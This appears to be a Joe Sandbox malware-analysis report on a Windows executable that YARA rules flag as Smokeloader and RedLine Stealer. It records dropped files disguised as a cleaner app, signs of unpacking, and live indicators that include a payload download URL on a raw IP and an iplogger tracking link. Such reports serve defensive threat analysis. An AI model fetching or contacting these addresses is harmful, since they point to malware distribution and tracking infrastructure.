Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download?
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00402C600_2_00402C60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00408E600_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004209440_2_00420944
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004159000_2_00415900
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040E9900_2_0040E990
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041C9A90_2_0041C9A9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041C2830_2_0041C283
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00424CDF0_2_00424CDF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004124E30_2_004124E3
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00424DFF0_2_00424DFF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00422ED90_2_00422ED9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004127150_2_00412715
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004500790_2_00450079
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00449A550_2_00449A55
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044D25B0_2_0044D25B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00448A680_2_00448A68
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044929B0_2_0044929B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044FB280_2_0044FB28
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004514C30_2_004514C3
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044F5D70_2_0044F5D7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044966D0_2_0044966D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00448EFD0_2_00448EFD
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_006850660_2_00685066
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_006690C70_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067297C0_2_0067297C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00675B670_2_00675B67
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066EBF70_2_0066EBF7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00680BAB0_2_00680BAB
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067C4EA0_2_0067C4EA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067274A0_2_0067274A
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00684F460_2_00684F46
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 004433B0 appears 32 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 0040DBA0 appears 39 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: String function: 0066DE07 appears 39 times
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
Source: nRGKqzVQRt.exe, 00000000.00000003.2555310975.0000000002E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exe, 00000000.00000003.2555038440.00000000036BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exe, 00000000.00000003.2555538426.0000000002EA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs nRGKqzVQRt.exe
Source: nRGKqzVQRt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: nRGKqzVQRt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@9/44@0/1
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00774B01 CreateToolhelp32Snapshot,Module32First,0_2_00774B01
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\name[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3212
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3Jump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: nine.exe0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: A@K.0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: two.exe0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: ZYA.0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: NOSUB0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: GET0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: kc~z0_2_00408E60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: n[B0_2_00425AC0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: A@K.0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: @G@K0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: ZYA.0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: kc~z0_2_006690C7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCommand line argument: P:C0_2_006690C7
Source: nRGKqzVQRt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: nRGKqzVQRt.exeVirustotal: Detection: 31%
Source: unknownProcess created: C:\Users\user\Desktop\nRGKqzVQRt.exe "C:\Users\user\Desktop\nRGKqzVQRt.exe"
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: nRGKqzVQRt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack .text:ER;.data:W;.vuri:R;.gocezi:R;.xolu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: nRGKqzVQRt.exeStatic PE information: section name: .vuri
Source: nRGKqzVQRt.exeStatic PE information: section name: .gocezi
Source: nRGKqzVQRt.exeStatic PE information: section name: .xolu
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C178 pushad ; retn 0042h0_2_0042C195
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042B105 push esi; ret 0_2_0042B10E
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C5CC push esp; retf 0_2_0042C5ED
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040D67E push ecx; ret 0_2_0040D691
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C62A push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0042C756 push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004433F5 push ecx; ret 0_2_00443408
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0044142C push ecx; ret 0_2_0044143F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066D8E5 push ecx; ret 0_2_0066D8F8
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D4C9 pushad ; ret 0_2_0067D4CA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D56D push esp; retf 0_2_0067D56E
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067D50C push eax; ret 0_2_0067D50D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067CF6F push esp; retf 0_2_0067CF77
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_007742AC pushfd ; retf 0_2_007742AD
Source: nRGKqzVQRt.exeStatic PE information: section name: .text entropy: 6.970623447290097
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Jump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
